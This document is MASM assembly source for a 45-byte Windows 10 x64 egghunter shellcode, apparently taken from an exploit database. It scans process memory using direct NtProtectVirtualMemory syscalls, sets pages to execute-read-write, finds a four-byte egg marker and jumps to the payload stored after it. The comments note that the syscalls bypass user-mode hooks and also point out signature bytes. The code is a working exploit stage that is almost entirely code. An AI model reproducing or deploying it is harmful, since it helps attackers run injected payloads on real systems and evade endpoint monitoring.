###########################

# Windows 10 x64 Egghunter Shellcode (45 bytes)

###########################

; Syntax: MASM (ml64) - Intel operand order, `;` comments.
; Target/ABI: Windows 10 x64. The routine below does not call kernel32 or
; ntdll; it issues a raw `syscall` using the Windows x64 native-call
; register convention (r10, rdx, r8, r9, then the stack slot at [rsp+28h]).
; The exported symbol is the routine's entry point.
PUBLIC Win10egghunterx64
 
.code
 
;-----------------------------------------------------------------------
; Win10egghunterx64 - 45-byte egghunter (memory scan for a 4-byte marker)
; Syntax: MASM (ml64).  Target: Windows 10 x64.
; What the code below does: starting at address 80h it probes each
; address by issuing the native call behind VirtualProtectEx
; (NtProtectVirtualMemory, service number 50h) directly with `syscall`;
; when the call succeeds it compares the dword at rdi with the marker
; 42303042h (scasd) and, on a match, transfers control to rdi.
; Register roles:
;   rdi = scan cursor (nonvolatile, survives the syscall)
;   rdx = &lpAddress slot   r8 = &dwSize slot   r9b = 40h (flNewProtect)
;   r10 = hProcess          rax = service number in, NTSTATUS out
; Stack: each iteration pushes 16 bytes (rdi, 08h) and pops 16 bytes at
; _setup, so the stack does not grow over the course of the scan.
; Analyst notes: the service number is build-specific (see
; _VirtualProtectEx); because `syscall` is issued from the shellcode
; itself, user-mode hooks on VirtualProtectEx / NtProtectVirtualMemory
; do not observe the call; the marker constant and the cmp al,01h / jge
; loop are fixed byte patterns usable as a signature for this sample.
;-----------------------------------------------------------------------
Win10egghunterx64 PROC
 
_start:
    push 7fh                              ; cursor starts at 7Fh; the inc at _setup makes the first probe 80h
    pop rdi                               ; RDI is nonvolatile, so it will be preserved after syscalls
 
_setup:                                   ; loop head: one probe per address
    inc rdi                               ; parameter 1 - lpAddress - advance the cursor by one byte
    mov r9b,40h                           ; parameter 3 - flNewProtect - 0x40 PAGE_EXECUTE_READWRITE (low byte only; assumes bits 8..63 of r9 are already zero - not established here)
    pop rsi                               ; discard 16 bytes: balances the push rdi / push 08h below so the
    pop rsi                               ;   stack stays level across iterations (the push rsp / pop pairs net zero)
    push rdi                              ; lpAddress slot on the stack
    push rsp
    pop rdx                               ; rdx = pointer to the lpAddress slot
    push 08h                              ; parameter 2 - dwSize 0x8
    push rsp
    pop r8                                ; r8 = pointer to the dwSize slot - can be exchanged with mov r8,rsp
    mov [rdx+20h],rsp                     ; parameter 4 - lpflOldprotect - the fifth native argument ([rsp+28h] at the syscall); it points at the dwSize slot, so on success the old protection is written over the 08h
    dec r10                               ; parameter 5 - hProcess - meant to yield -1 (current process); the page notes that leaving it unset gives a c0000008 error. Assumes r10 is 0 each time this runs - whether the syscall return resets it is not shown here
_VirtualProtectEx:
     
    push 50h                              ; 0x50h for Windows 10 and Windows Server 2016 x64, 0x4Dh for Windows 7 family
    pop rax
    syscall                               ; direct native call; rcx and r11 are clobbered by syscall, rdi is not
 
_rc_check:
 
    cmp al,01h                            ; low byte of the NTSTATUS in al; 0 (STATUS_SUCCESS) falls through to the compare
    jge _setup                            ; signed compare: assumes a failing status leaves a low byte in 1..7Fh (e.g. c0000008 -> 08h); a low byte >= 80h would also fall through
 
_end:                                     ; the probed address is accessible: compare the marker
     
    mov eax, 042303042h                   ; the egg; in memory the bytes are 42 30 30 42 (a fixed signature for this sample)
    scasd                                 ; compare eax with the dword at [rdi], then rdi += 4 (assumes DF is clear)
    jnz _setup                            ; no match: next probe (scasd already moved rdi by 4; the inc at _setup adds 1 more)
    jmp rdi                               ; match: control goes to rdi, i.e. just past the compared dword
 
Win10egghunterx64 ENDP
END

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2017-04-07]

###########################